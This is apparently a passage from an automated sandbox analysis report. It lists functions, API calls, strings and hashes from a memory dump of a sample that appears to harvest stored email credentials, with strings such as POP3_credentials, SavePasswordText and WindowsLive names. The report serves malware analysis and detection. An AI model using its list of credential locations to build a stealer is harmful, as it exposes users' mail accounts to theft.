                      Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      • _mbscpy.MSVCRT ref: 00409686
                      • _mbscpy.MSVCRT ref: 00409696
                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                      • API String ID: 888011440-2039793938
                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                      Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • unable to open database: %s, xrefs: 0042EBD6
                      • out of memory, xrefs: 0042EBEF
                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                      • too many attached databases - max %d, xrefs: 0042E951
                      • cannot ATTACH database within transaction, xrefs: 0042E966
                      • database is already attached, xrefs: 0042EA97
                      • database %s is already in use, xrefs: 0042E9CE
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                      Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                      • strchr.MSVCRT ref: 0040327B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileStringstrchr
                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                      • API String ID: 1348940319-1729847305
                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                      Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                      • API String ID: 3510742995-3273207271
                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                      Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                      • memset.MSVCRT ref: 0040FA1E
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                      • _strnicmp.MSVCRT ref: 0040FA4F
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                      • String ID: WindowsLive:name=*$windowslive:name=
                      • API String ID: 945165440-3589380929
                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                      Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                        • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                      • strchr.MSVCRT ref: 0040371F
                      • _mbscpy.MSVCRT ref: 00403748
                      • _mbscpy.MSVCRT ref: 00403758
                      • strlen.MSVCRT ref: 00403778
                      • sprintf.MSVCRT ref: 0040379C
                      • _mbscpy.MSVCRT ref: 004037B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                      • String ID: %s@gmail.com
                      • API String ID: 500647785-4097000612
                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                      Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004094C8
                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                      • memset.MSVCRT ref: 0040950C
                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                      • _strcmpi.MSVCRT ref: 00409531
                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                      • String ID: sysdatetimepick32
                      • API String ID: 3411445237-4169760276
                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                      Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                      • GetSysColor.USER32(0000000F), ref: 0040B472
                      • DeleteObject.GDI32(?), ref: 0040B4A6
                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteImageLoadObject$Color
                      • String ID:
                      • API String ID: 3642520215-0
                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                      Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                      • GetDC.USER32(00000000), ref: 004072FB
                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                      • String ID:
                      • API String ID: 1999381814-0
                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                      Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                      • API String ID: 1297977491-3883738016
                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                      Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                      • memcpy.MSVCRT ref: 0044972E
                      • memcpy.MSVCRT ref: 0044977B
                      • memcpy.MSVCRT ref: 004497F6
                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                      • memcpy.MSVCRT ref: 00449846
                      • memcpy.MSVCRT ref: 00449887
                      • memcpy.MSVCRT ref: 004498B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                      Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: __aulldvrm$__aullrem
                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                      • API String ID: 643879872-978417875
                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                      Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                      • memset.MSVCRT ref: 004058C3
                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                      • SetFocus.USER32(?), ref: 00405976
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                      Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                      • _mbscat.MSVCRT ref: 0040A8FF
                      • sprintf.MSVCRT ref: 0040A921
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileWrite_mbscatsprintfstrlen
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 1631269929-4153097237
                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                      Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040810E
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                      • String ID: POP3_credentials$POP3_host$POP3_name
                      • API String ID: 524865279-2190619648
                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                      Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetstrchr
                      • String ID: 0$6
                      • API String ID: 2300387033-3849865405
                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                      Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpystrlen$memsetsprintf
                      • String ID: %s (%s)
                      • API String ID: 3756086014-1363028141
                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                      Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf
                      • String ID: %2.2X
                      • API String ID: 125969286-791839006
                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                      Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                      • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                      • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                      • CloseHandle.KERNEL32(?), ref: 00444206
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                      • String ID: ACD
                      • API String ID: 1886237854-620537770
                      • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                      • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                      Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004091EC
                      • sprintf.MSVCRT ref: 00409201
                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                        • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                      • SetWindowTextA.USER32(?,?), ref: 00409228
                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                      • String ID: caption$dialog_%d
                      • API String ID: 2923679083-4161923789
                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                      Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                      • unknown error, xrefs: 004277B2
                      • abort due to ROLLBACK, xrefs: 00428781
                      • no such savepoint: %s, xrefs: 00426A02
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                      • API String ID: 3510742995-3035234601
                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                      Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
